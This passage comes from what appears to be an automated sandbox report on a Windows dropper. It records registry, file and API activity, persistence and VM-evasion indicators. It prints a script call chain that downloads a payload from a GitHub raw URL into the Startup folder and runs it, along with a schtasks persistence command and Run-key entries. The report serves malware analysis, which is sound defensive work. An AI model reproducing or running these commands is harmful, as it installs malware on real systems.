                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: VFNCBO.lnk.7.drLNK file: ..\..\..\..\..\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\4OA6BPo.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                                Data Obfuscation

                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe")
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00F630B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00F630B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023020C pushfd ; retf 7_2_00230215
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024C6CC push esi; ret 7_2_0024C6CE
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CB5D push edi; ret 7_2_0020CB5F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CC76 push esi; ret 7_2_0020CC78
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CE51 push esi; ret 7_2_0020CE53
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CF3A push edi; ret 7_2_0020CF3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00207795 push ecx; ret 7_2_002077A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022BB9D push FFFFFF8Bh; iretd 7_2_0022BB9F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E5020C pushfd ; retf 16_2_00E50215
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6C6CC push esi; ret 16_2_00E6C6CE
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CB5D push edi; ret 16_2_00E2CB5F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CC76 push esi; ret 16_2_00E2CC78
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CE51 push esi; ret 16_2_00E2CE53
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CF3A push edi; ret 16_2_00E2CF3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E27795 push ecx; ret 16_2_00E277A8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4BB9D push FFFFFF8Bh; iretd 16_2_00E4BB9F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0023020C pushfd ; retf 22_2_00230215
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024C6CC push esi; ret 22_2_0024C6CE
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CB5D push edi; ret 22_2_0020CB5F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CC76 push esi; ret 22_2_0020CC78
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CE51 push esi; ret 22_2_0020CE53
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CF3A push edi; ret 22_2_0020CF3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00207795 push ecx; ret 22_2_002077A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022BB9D push FFFFFF8Bh; iretd 22_2_0022BB9F
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCX4F1F.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file

                                Boot Survival

                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFNCBO.lnkJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VFNCBOJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_001FF78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00247F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00E1F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E67F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00E67F0E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_001FF78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_00247F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E21E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00E21E5A
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_7-104723
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: threadDelayed 4608Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: foregroundWindowGot 1299Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvaded block: after key decisiongraph_7-102965
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 6.6 %
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe TID: 5544Thread sleep time: -46080s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7192Thread sleep count: 156 > 30Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7192Thread sleep time: -9360000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 9320Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeThread sleep count: Count: 4608 delay: -10Jump to behavior
                                Source: Yara matchFile source: 0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2962021382.0000000002AFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4268, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,7_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,7_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,7_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FD47 FindFirstFileW,FindClose,7_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0022FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E52044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E5219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E524A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,16_2_00E46B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,16_2_00E46E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E4F350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00E4FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1DD92 GetFileAttributesW,FindFirstFileW,FindClose,16_2_00E1DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FD47 FindFirstFileW,FindClose,16_2_00E4FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FD47 FindFirstFileW,FindClose,22_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_0022FDD2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_001FE47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                                Source: wscript.exe, 00000000.00000002.1763425804.00000229948B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: NUHORT.exe, 00000018.00000003.2349387548.00000000018A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
                                Source: Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnd
                                Source: wscript.exe, 00000000.00000002.1763617544.0000022996F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.00000000007C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: ._cache_update.exe, 00000007.00000002.2965345252.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Process information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023703C BlockInput,7_2_0023703C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_001E374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002146D0 LoadLibraryExW,GetLastError,LoadLibraryW,6C1F6DE0,6C1F6DE0,6C1F6DE0,6C1F6DE0,6C1F6DE0,IsDebuggerPresent,OutputDebugStringW,7_2_002146D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00F630B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00F630B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020A937 GetProcessHeap,7_2_0020A937
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00208E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00208E19 SetUnhandledExceptionFilter,7_2_00208E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E28E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00E28E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E28E19 SetUnhandledExceptionFilter,16_2_00E28E19
